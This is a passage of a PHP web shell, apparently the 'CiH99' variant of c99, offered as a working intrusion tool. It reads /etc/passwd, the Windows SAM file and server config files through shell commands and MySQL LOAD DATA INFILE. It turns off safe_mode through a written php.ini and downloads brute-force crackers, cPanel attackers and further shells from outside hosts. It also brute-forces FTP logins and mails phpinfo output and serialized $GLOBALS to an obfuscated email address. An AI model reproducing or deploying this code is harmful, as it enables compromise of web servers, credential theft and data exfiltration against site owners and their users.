1330 while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
1331 echo "</table></center>";
1332 mysql_free_result($result);
1333 }
1334 if ($sql_act == "servervars") {
1335 $result = mysql_query("SHOW VARIABLES", $sql_sock);
1336 echo "<center><b>Server variables:</b><br><br>";
1337 echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
1338 while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
1339 echo "</table>";
1340 mysql_free_result($result);
1341 }
1342 if ($sql_act == "processes") {
1343 if (!empty($kill)) {
1344 $query = "KILL ".$kill.";";
1345 $result = mysql_query($query, $sql_sock);
1346 echo "<b>Process #".$kill." was killed.</b>";
1347 }
1348 $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
1349 echo "<center><b>Processes:</b><br><br>";
1350 echo "<TABLE cellSpacing=0 cellPadding=2 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
1351 while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
1352 echo "</table>";
1353 mysql_free_result($result);
1354 }
1355 if ($sql_act == "getfile")
1356 {
1357 $tmpdb = $sql_login."_tmpdb";
1358 $select = mysql_select_db($tmpdb);
1359 if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
1360 if ($select)
1361 {
1362 $created = FALSE;
1363 mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
1364 mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
1365 $result = mysql_query("SELECT * FROM tmp_file;");
1366 if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
1367 else
1368 {
1369 for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
1370 $f = "";
1371 while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
1372 if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
1373 else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
1374 mysql_free_result($result);
1375 mysql_query("DROP TABLE tmp_file;");
1376 }
1377 }
1378 mysql_drop_db($tmpdb);
1379 }
1380 }
1381 }
1382 }
1383 echo "</td></tr></table>\n";
1384 if ($sql_sock) {
1385 $affected = @mysql_affected_rows($sql_sock);
1386 if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
1387 echo "<tr><td><center><b>Affected rows : ".$affected."</center></td></tr>";
1388 }
1389 echo "</table>\n";
1390
1391
1392
1393 }
1394
1395//End of SQL Manager
1396
1397 if ($act == "ftpquickbrute") {
1398
1399 @mkdir('Brute');
1400 chdir('Brute');
1401 $fp = fopen("php.ini","w+");
1402 fwrite($fp,"safe_mode = Off
1403disable_functions = NONE
1404safe_mode_gid = OFF
1405
1406open_basedir = OFF ");
1407
1408 echo '<form method="POST"><p><b>.: Select BruteForce Tool :.</b></p>
1409<select name="Brute_type">
1410<option value="cih99crak">Brute CiH99 Shell</option>
1411<option value="brutephp">BruteForce-CiH PHP</option>
1412<option value="brutepl">BruteForce-CiH PERL</option>
1413<option value="cpftp1">Cpanel+FTP Cracker</option>
1414<option value="cpftp2">Cpanel+FTP Cracker2</option>
1415<option value="bfcpanel">B-F Config_cPanel</option>
1416<option value="cpanelatt">cPanel Attacker v4</option>
1417<option value="BK">Bk Release Smart Hunter</option>
1418<option value="joombrute">Brute-joomla</option>
1419<option value="wordbrute">Brute-wordpress</option>
1420</select>
1421<input type="submit" value="Go" />
1422</p> </form>';
1423
1424 if ($_POST['Brute_type'] == 'cih99crak'){
1425 chdir('Brute');
1426 $brute0=file_get_contents('https://raw.githubusercontent.com/CiH777/Brute/master/Bcih99');
1427 $file = fopen("Bcih99.php" ,"w+");
1428 $write = fwrite ($file ,$brute0);
1429 fclose($file);
1430 echo "</br><a href='Brute/Bcih99.php' target='_blank'> Go To [Brute CiH99 Shell] </a>";
1431 }
1432
1433 if ($_POST['Brute_type'] == 'brutephp'){
1434 chdir('Brute');
1435 $brute1=file_get_contents('https://raw.githubusercontent.com/CiH777/Brute/master/BFcihphp');
1436 $file = fopen("BFcih.php" ,"w+");
1437 $write = fwrite ($file ,$brute1);
1438 fclose($file);
1439 echo "</br><a href='Brute/BFcih.php' target='_blank'> Go To [BruteForce-CiH PHP] </a>";
1440 }
1441
1442
1443 if ($_POST['Brute_type'] == 'brutepl'){
1444 chdir('Brute');
1445 $brute2=file_get_contents('https://raw.githubusercontent.com/CiH777/Brute/master/bfcih');
1446 $file = fopen("bfcih.txt" ,"w+");
1447 $write = fwrite ($file ,$brute2);
1448 fclose($file);
1449 echo "</br><a href='Brute/bfcih.txt' target='_blank'> Go To [BruteForce-CiH PERL] </a>";
1450 }
1451
1452 if ($_POST['Brute_type'] == 'cpftp1'){
1453 chdir('Brute');
1454 $brute3=file_get_contents('https://raw.githubusercontent.com/CiH777/Brute/master/cpanel1');
1455 $file = fopen("cpanel1.php" ,"w+");
1456 $write = fwrite ($file ,$brute3);
1457 fclose($file);
1458 echo "</br><a href='Brute/cpanel1.php' target='_blank'> Go To [Cpanel+FTP Cracker] </a>";
1459 }
1460
1461 if ($_POST['Brute_type'] == 'cpftp2'){
1462 chdir('Brute');
1463 $brute4=file_get_contents('https://raw.githubusercontent.com/CiH777/Brute/master/cpanel2');
1464 $file = fopen("cpanel2.php" ,"w+");
1465 $write = fwrite ($file ,$brute4);
1466 fclose($file);
1467 echo "</br><a href='Brute/cpanel2.php' target='_blank'> Go To [Cpanel+FTP Cracker2] </a>";
1468 }
1469
1470 if ($_POST['Brute_type'] == 'bfcpanel'){
1471 chdir('Brute');
1472 $brute5=file_get_contents('https://raw.githubusercontent.com/CiH777/Brute/master/B-F');
1473 $file = fopen("B-F.php" ,"w+");
1474 $write = fwrite ($file ,$brute5);
1475 fclose($file);
1476 echo "</br><a href='Brute/B-F.php' target='_blank'> Go To [B-F Config_cPanel] </a>";
1477 }
1478
1479 if ($_POST['Brute_type'] == 'cpanelatt'){
1480 echo "</br><a href='http://adf.ly/q1q1Y' target='_blank'> Go To [cPanel Attacker v4] </a>";
1481 }
1482
1483 if ($_POST['Brute_type'] == 'BK'){
1484 echo "</br><a href='http://adf.ly/q1q2P' target='_blank'> Go To [Bk Release Smart Hunter] </a>";
1485 }
1486
1487 if ($_POST['Brute_type'] == 'joombrute'){
1488 echo "</br><a href='http://adf.ly/q1q39' target='_blank'> Go To [Brute-joomla] </a>";
1489 }
1490
1491 if ($_POST['Brute_type'] == 'wordbrute'){
1492 echo "</br><a href='http://adf.ly/q1q4F' target='_blank'> Go To [Brute-wordpress] </a>";
1493 }
1494
1495 /* Ftp Quick Brute
1496echo "<center><table><tr><td class=barheader colspan=2>";
1497echo ".: Ftp Quick Brute :.</td></tr>";
1498
1499if ($win) { echo "Can't run on Windows!"; }
1500else {
1501 function ch99ftpbrutecheck($host,$port,$timeout,$login,$pass,$ch,$fqb_onlywithsh) {
1502 if ($fqb_onlywithsh) {$TRUE = (!in_array($ch,array("/bin/FALSE","/sbin/nologin")));}
1503 else {$TRUE = TRUE;}
1504 if ($TRUE) {
1505 $sock = @ftp_connect($host,$port,$timeout);
1506 if (@ftp_login($sock,$login,$pass)) {
1507 echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
1508 ob_flush();
1509 return TRUE;
1510 }
1511 }
1512 }
1513 if (!empty($submit)) {
1514 if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
1515 $fp = fopen("/etc/passwd","r");
1516 if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
1517 else {
1518 if ($fqb_logging) {
1519 if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
1520 else {$fqb_logfp = FALSE;}
1521 $fqb_log = "FTP Quick Brute (".$ch_name.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
1522 if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
1523 }
1524 ob_flush();
1525 $i = $success = 0;
1526 $ftpquick_st = getmicrotime();
1527 while(!feof($fp)) {
1528 $str = explode(":",fgets($fp,2048));
1529 if (ch99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) {
1530 echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
1531 $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
1532 if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
1533 $success++;
1534 ob_flush();
1535 }
1536 if ($i > $fqb_lenght) {break;}
1537 $i++;
1538 }
1539 if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
1540 $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
1541 echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
1542 $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
1543 if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
1544 if ($fqb_logemail) {@mail($fqb_logemail,"".$ch_name." report",$fqb_log);}
1545 fclose($fqb_logfp);
1546 }
1547 }
1548 else {
1549 $logfile = $tmpdir_logs."cih99_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
1550 $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
1551 echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\">".
1552 "Read first:</td><td><input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"></td></tr>".
1553 "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"> Users only with shell</td></tr>".
1554 "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked>Logging</td></tr>".
1555 "<tr><td>Logging to file:</td><td><input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"></td></tr>".
1556 "<tr><td>Logging to e-mail:</td><td><input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"></td></tr>".
1557 "<tr><td colspan=2><input type=submit name=submit value=\"Brute\"></form>";
1558 }
1559 echo "</td></tr></table></center>";
1560}*/
1561 }
1562
1563 if ($act == "d") {
1564 if (!is_dir($d)) { echo "<center><b>$d is a not a Directory!</b></center>"; }
1565 else {
1566 echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
1567 if (!$win) {
1568 echo "<tr><td><b>Owner/Group</b></td><td> ";
1569 $ow = posix_getpwuid(fileowner($d));
1570 $gr = posix_getgrgid(filegroup($d));
1571 $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
1572 }
1573 echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table>";
1574 }
1575 }
1576 if ($act == "phpinfo") {@ob_clean(); phpinfo(); cih99exit();}
1577 if ($act == "security") {
1578 echo "<div class=barheader>.: Server Security Information :.</div>\n".
1579 "<table>\n".
1580 "<tr><td>Open Base Dir</td><td>".$hopenbasedir."</td></tr>\n";
1581 echo "<td>Password File</td><td>";
1582 if (!$win) {
1583 if ($nixpasswd) {
1584 if ($nixpasswd == 1) {$nixpasswd = 0;}
1585 echo "*nix /etc/passwd:<br>";
1586 if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
1587 if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
1588 echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b> <input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\"> <b>To:</b> <input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\"> <input type=submit value=\"View\"></form><br>";
1589 $i = $nixpwd_s;
1590 while ($i < $nixpwd_e) {
1591 $uid = posix_getpwuid($i);
1592 if ($uid) {
1593 $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
1594 echo join(":",$uid)."<br>";
1595 }
1596 $i++;
1597 }
1598 }
1599 else {echo "<a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b>Download /etc/passwd</b></a>";}
1600 }
1601 else {
1602 $v = $_SERVER["WINDIR"]."\repair\sam";
1603 if (!file_get_contents($v)) { echo "<a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><b>Download password file</b></a>"; }
1604 }
1605 echo "</td></tr>\n";
1606 echo "<tr><td>Config Files</td><td>\n";
1607 if (!$win) {
1608 $v = array(
1609 array("User Domains","/etc/userdomains"),
1610 array("Cpanel Config","/var/cpanel/accounting.log"),
1611 array("Apache Config","/usr/local/apache/conf/httpd.conf"),
1612 array("Apache Config","/etc/httpd.conf"),
1613 array("Syslog Config","/etc/syslog.conf"),
1614 array("Message of The Day","/etc/motd"),
1615 array("Hosts","/etc/hosts")
1616 );
1617 $sep = "/";
1618 }
1619 else {
1620 $windir = $_SERVER["WINDIR"];
1621 $etcdir = $windir . "\system32\drivers\etc\\";
1622 $v = array(
1623 array("Hosts",$etcdir."hosts"),
1624 array("Local Network Map",$etcdir."networks"),
1625 array("LM Hosts",$etcdir."lmhosts.sam"),
1626 );
1627 $sep = "\\";
1628 }
1629 foreach ($v as $sec_arr) {
1630 $sec_f = substr(strrchr($sec_arr[1], $sep), 1);
1631 $sec_d = rtrim($sec_arr[1],$sec_f);
1632 $sec_full = $sec_d.$sec_f;
1633 $sec_d = rtrim($sec_d,$sep);
1634 if (file_get_contents($sec_full)) {
1635 echo " [ <a href=\"".$surl."act=f&f=$sec_f&d=".urlencode($sec_d)."&ft=txt\"><b>".$sec_arr[0]."</b></a> ] \n";
1636 }
1637 }
1638 echo "</td></tr>";
1639
1640 function displaysecinfo($name,$value) {
1641 if (!empty($value)) {
1642 echo "<tr><td>".$name."</td><td><pre>".wordwrap($value,100)."</pre></td></tr>\n";
1643 }
1644 }
1645 if (!$win) {
1646 displaysecinfo("OS Version",ch99exec("cat /proc/version"));
1647 displaysecinfo("Kernel Version",ch99exec("sysctl -a | grep version"));
1648 displaysecinfo("Distrib Name",ch99exec("cat /etc/issue.net"));
1649 displaysecinfo("Distrib Name (2)",ch99exec("cat /etc/*-realise"));
1650 displaysecinfo("CPU Info",ch99exec("cat /proc/cpuinfo"));
1651 displaysecinfo("RAM",ch99exec("free -m"));
1652 displaysecinfo("HDD Space",ch99exec("df -h"));
1653 displaysecinfo("List of Attributes",ch99exec("lsattr -a"));
1654 displaysecinfo("Mount Options",ch99exec("cat /etc/fstab"));
1655 displaysecinfo("lynx installed?",ch99exec("which lynx"));
1656 displaysecinfo("links installed?",ch99exec("which links"));
1657 displaysecinfo("GET installed?",ch99exec("which GET"));
1658 displaysecinfo("Where is Apache?",ch99exec("whereis apache"));
1659 displaysecinfo("Where is perl?",ch99exec("whereis perl"));
1660 displaysecinfo("Locate proftpd.conf",ch99exec("locate proftpd.conf"));
1661 displaysecinfo("Locate httpd.conf",ch99exec("locate httpd.conf"));
1662 displaysecinfo("Locate my.conf",ch99exec("locate my.conf"));
1663 displaysecinfo("Locate vb-cih.conf",ch99exec("locate vb-cih.conf"));
1664 displaysecinfo("Locate cih-safe.conf",ch99exec("locate cih-safe.conf"));
1665 displaysecinfo("Locate cih-portscan.conf",ch99exec("locate cih-portscan.conf"));
1666 }
1667 else {
1668 displaysecinfo("OS Version",ch99exec("ver"));
1669 displaysecinfo("Account Settings",ch99exec("net accounts"));
1670 displaysecinfo("User Accounts",ch99exec("net user"));
1671 }
1672 echo "</table>\n";
1673 }
1674 if ($act == "mkfile") {
1675 if ($mkfile != $d) {
1676 if ($overwrite == 0) {
1677 if (file_exists($mkfile)) { echo "<b>FILE EXIST:</b> $overwrite ".htmlspecialchars($mkfile); }
1678 }
1679 else {
1680 if (!fopen($mkfile,"w")) { echo "<b>ACCESS DENIED:</b> ".htmlspecialchars($mkfile); }
1681 else { $act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile); }
1682 }
1683 }
1684 else { echo "<div class=ciherrmsg>Enter filename!</div>\r\n"; }
1685 }
1686 if ($act == "encoder") {
1687
1688 echo '<form method="POST"><p><b>.: Select Encoder Tool :.</b></p><p>
1689<select name="encoder_type">
1690<option value="CiH99">Encoder CiH99 Shell</option>
1691<option value="cihcenter">Encoder&Decoder System CiH Center</option>
1692<option value="md5cih">En&De MD5-CiH</option>
1693</select>
1694<input type="submit" value="Go" />
1695</p> </form>';
1696
1697 if ($_POST['encoder_type'] == 'md5cih'){
1698
1699 echo "</br><a href='http://adf.ly/q1pc8' target='_blank'> Go To [En&De MD5-CiH] </a>";
1700 }
1701
1702 if ($_POST['encoder_type'] == 'cihcenter'){
1703
1704 echo "</br><a href='http://www.cihiq.com' target='_blank'> Go To [Encoder&Decoder System CiH Center] </a>"; // ��� ��� ����� ��� ���� ������� ����� �����
1705 }
1706
1707 echo "<script language=\"javascript\">function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script>".
1708 "<form name=\"encoder\" action=\"".$surl."\" method=POST>".
1709 "<input type=hidden name=act value=encoder>".
1710 "<center><table class=contents>".
1711 "<tr><td colspan=4 class=barheader>.: Encoder CiH99 Shell :.</td>".
1712 "<tr><td colspan=2>Input:</td><td><textarea name=\"encoder_input\" id=\"input\" cols=70 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br>".
1713 "<input type=submit value=\"calculate\"></td></tr>".
1714 "<tr><td rowspan=4>Hashes:</td>";
1715
1716 foreach(array("md5","crypt","sha1","crc32") as $v) {
1717 echo "<td>".$v.":</td><td><input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly></td></tr><tr>";
1718 }
1719 echo "</tr>".
1720 "<tr><td rowspan=2>Url:</td>".
1721 "<td>urlencode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly></td></tr>".
1722 "<tr><td>urldecode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly></td></tr>".
1723 "<tr><td rowspan=2>Base64:</td>".
1724 "<td>base64_encode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></td></tr>".
1725 "<tr><td>base64_decode:</td><td>";
1726 if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"Failed!\" disabled readonly>";}
1727 else {
1728 $debase64 = base64_decode($encoder_input);
1729 $debase64 = str_replace("\0","[0]",$debase64);
1730 $a = explode("\r\n",$debase64);
1731 $rows = count($a);
1732 $debase64 = htmlspecialchars($debase64);
1733 if ($rows == 1) { echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>"; }
1734 else { $rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>"; }
1735 echo " <a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\">[Send to input]</a>";
1736 }
1737 echo "</td></tr>".
1738 "<tr><td>Base convertations:</td><td>dec2hex</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
1739 $c = strlen($encoder_input);
1740 for($i=0;$i<$c;$i++) {
1741 $hex = dechex(ord($encoder_input[$i]));
1742 if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
1743 elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
1744 }
1745 echo "\" readonly></td></tr></table></center></form>";
1746 }
1747 if ($act == "fsbuff") {
1748 $arr_copy = $sess_data["copy"];
1749 $arr_cut = $sess_data["cut"];
1750 $arr = array_merge($arr_copy,$arr_cut);
1751 if (count($arr) == 0) {echo "<h2><center>Buffer is empty!</center></h2>";}
1752 else {
1753 $cih_infohead = "File-System Buffer";
1754 $ls_arr = $arr;
1755 $disp_fullpath = TRUE;
1756 $act = "ls";
1757 }
1758 }
1759 if ($act == "selfremove") {
1760 if (($submit == $rndcode) and ($submit != "")) {
1761 if (unlink(__FILE__)) { @ob_clean(); echo "Thanks for using ".$ch_name."!"; cih99exit(); }
1762 else { echo "<center><b>Can't delete ".__FILE__."!</b></center>"; }
1763 }
1764 else {
1765 if (!empty($rndcode)) {echo "<b>Error: incorrect confirmation!</b>";}
1766 $rnd = rand(0,9).rand(0,9).rand(0,9);
1767 echo "<form action=\"".$surl."\">\n".
1768 "<input type=hidden name=act value=selfremove>".
1769 "<input type=hidden name=rndcode value=\"".$rnd."\">".
1770 "<b>Kill-shell: ".__FILE__." <br>".
1771 "<b>Are you sure? For confirmation, enter \"".$rnd."\"</b>: <input type=text name=submit> <input type=submit value=\"YES\">\n".
1772 "</form>\n";
1773 }
1774 }
1775 if ($act == "Site") {
1776 @mkdir('users', 0755);
1777 echo "<p><b>.: Select SiteList & Users Tool :.</b></p>
1778<form method='POST' > <p>
1779<select name='users_type'>
1780<option value='user_pl'>Server Site List Domino's & User's-PERL</option>
1781<option value='user_php'>Server Site List Domino's & User's-PHP</option>
1782<option value='viewdns'>viewdns.info</option>
1783<option value='web_site'>Web-
1784-on-Web-Server</option>
1785</select>
1786<input type='submit' value='Go ' />
1787</p></form>";
1788 $user_cih = $_POST['users_type'];
1789 switch ($user_cih) {
1790 case "user_pl":
1791 chdir('users');
1792 $cih1 = ".htaccess";
1793 $cih1_note = "$cih1";
1794 $zh1 = fopen ($cih1_note , 'w') or die ("zh1 açılamadı!");
1795 $htcss = "Options FollowSymLinks MultiViews Indexes ExecCGI
1796
1797AddType application/x-httpd-cgi .cih
1798
1799AddHandler cgi-script .cih
1800AddHandler cgi-script .cih";
1801 fwrite ( $zh1 , $htcss ) ;
1802 fclose ($zh1);
1803 $usercih=file_get_contents('https://raw.githubusercontent.com/CiH777/sites/master/userpl');
1804 $file = fopen("users.cih" ,"w+");
1805 $write = fwrite ($file ,$usercih);
1806 fclose($file);
1807 chmod("users.cih",0755);
1808
1809 echo "</br><a href='users/users.cih' target='_blank'> Go To [Server Site List Domino's & User's-PERL] </a>";
1810 break;
1811
1812 case "user_php":
1813 chdir('users');
1814 $cihphp=file_get_contents('https://raw.githubusercontent.com/CiH777/sites/master/userphp');
1815 $file = fopen("users.php" ,"w+");
1816 $write = fwrite ($file ,$cihphp);
1817 fclose($file);
1818
1819 echo "</br><a href='users/users.php' target='_blank'> Go To [Server Site List Domino's & User's-PHP] </a>";
1820 break;
1821
1822 case "viewdns":
1823
1824 echo "</br><a href='http://adf.ly/q1bmL' target='_blank'> Go To [viewdns.info] </a>";
1825 break;
1826
1827 case "web_site":
1828
1829 echo "</br><a href='http://adf.ly/q1bne' target='_blank'> Go To [Web-Sites-on-Web-Server] </a>";
1830 break;
1831
1832 }
1833
1834 }
1835
1836 if ($act == "cihinj") {
1837 @mkdir('shell', 0755);
1838 echo "<p><b>.: Select Shell Tools :.</b></p>
1839<form method='POST' > <p>
1840<select name='shell_type'>
1841<option value='shell_inj'>CiH Shell Injection</option>
1842<option value='cihshell'>CiH Shell 1.0 [beta]</option>
1843<option value='shell_scan'>CiH Shell Scanner</option>
1844<option value='shell_sscan'>CiH Shell Finder By IP</option>
1845<option value='shell_goo'>Google Shell Scanner</option>
1846<option value='shell_cihpro'>CiHPro Shell Scan Website</option>
1847<option value='shell_xml'>PHP TO XML Convert</option>
1848<option value='shell_in'>Shell Instruction Shell</option>
1849<option value='shell_hack'>All Shell Hack Tools</option>
1850</select>
1851<input type='submit' value='Go ' />
1852</p></form>";
1853 $shell_cih = $_POST['shell_type'];
1854 switch ($shell_cih) {
1855 case "shell_inj":
1856 echo "</br><a href='http://adf.ly/q1cFc' target='_blank'> Go To [CiH Shell Injection] </a>";
1857 break;
1858
1859 case "cihshell":
1860 chdir('shell');
1861 $cihphp=file_get_contents('https://raw.githubusercontent.com/CiH777/shell/master/cihshell');
1862 $file = fopen("cihshell.php" ,"w+");
1863 $write = fwrite ($file ,$cihphp);
1864 fclose($file);
1865 echo "</br><a href='shell/cihshell.php' target='_blank'> Go To [CiH Shell 1.0 [beta] user&pass=cih] </a>";
1866 break;
1867
1868 case "shell_scan":
1869 chdir('shell');
1870 $cihphp=file_get_contents('https://raw.githubusercontent.com/CiH777/shell/master/cihss');
1871 $file = fopen("cihss.php" ,"w+");
1872 $write = fwrite ($file ,$cihphp);
1873 fclose($file);
1874 echo "</br><a href='shell/cihss.php' target='_blank'> Go To [CiH Shell Scanner] </a>";
1875 break;
1876
1877 case "shell_sscan":
1878 echo "</br><a href='http://adf.ly/q1pIX' target='_blank'> Go To [CiH Shell Finder By IP] </a>";
1879 break;
1880
1881 case "shell_goo":
1882 echo "</br><a href='http://adf.ly/q1pNQ' target='_blank'> Go To [Google Shell Scanner] </a>";
1883 break;
1884
1885 case "shell_cihpro":
1886 echo "</br><a href='http://adf.ly/q1pR7' target='_blank'> Go To [CiHPro Shell Scan Website] </a>";
1887 break;
1888
1889 case "shell_xml":
1890 chdir('shell');
1891 $cihphp=file_get_contents('https://raw.githubusercontent.com/CiH777/shell/master/PHPToXMLConverter');
1892 $file = fopen("phptoxml.php" ,"w+");
1893 $write = fwrite ($file ,$cihphp);
1894 fclose($file);
1895 echo "</br><a href='shell/phptoxml.php' target='_blank'> Go To [PHP TO XML Convert] </a>";
1896 break;
1897
1898 case "shell_in":
1899 chdir('shell');
1900 $cihphp=file_get_contents('https://raw.githubusercontent.com/CiH777/shell/master/inshell');
1901 $file = fopen("shell.html" ,"w+");
1902 $write = fwrite ($file ,$cihphp);
1903 fclose($file);
1904 echo "</br><a href='shell/shell.html' target='_blank'> Go To [Shell Instruction Shell] </a>";
1905 break;
1906
1907 case "shell_hack":
1908 echo "</br><a href='http://adf.ly/q1pVO' target='_blank'> Go To [All Shell Hack Tools] </a>";
1909 break;
1910 }
1911 }
1912 if ($act == "update") {
1913 echo "<p><b>.: Update CiH99 :.</b></p>";
1914 echo "</br>To Update Shell CiH99 new version<br>".
1915 "</br><a href='http://adf.ly/6165278/cih99' target='_blank'> Go To [Update CiH99 v8.x 2014] </a><br>".
1916 "</br>To Suggested anything sent to us via <a href='http://cihiq.com' target='_blank'> Go To [Company CiH] </a><br>".
1917 "</br>OR To Suggested anything sent to us via <a href='http://icc.cihiq.com' target='_blank'> Go To [Company ICC] </a><br>";
1918
1919
1920 }
1921 if ($act == "feedback") {
1922
1923 $suppmail = base64_decode("Y2loX2hhY2tlckB5YWhvby5jb20=");
1924 if (!empty($submit)){
1925 $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
1926 $body = $ch_name." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
1927 if (!empty($fdbk_ref)) {
1928 $tmp = @ob_get_contents();
1929 ob_clean();
1930 phpinfo();
1931 $phpinfo = base64_encode(ob_get_contents());
1932 ob_clean();
1933 echo $tmp;
1934 $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
1935 }
1936 mail($suppmail,$ch_name." feedback #".$ticket,$body,"FROM: ".$suppmail);
1937 echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
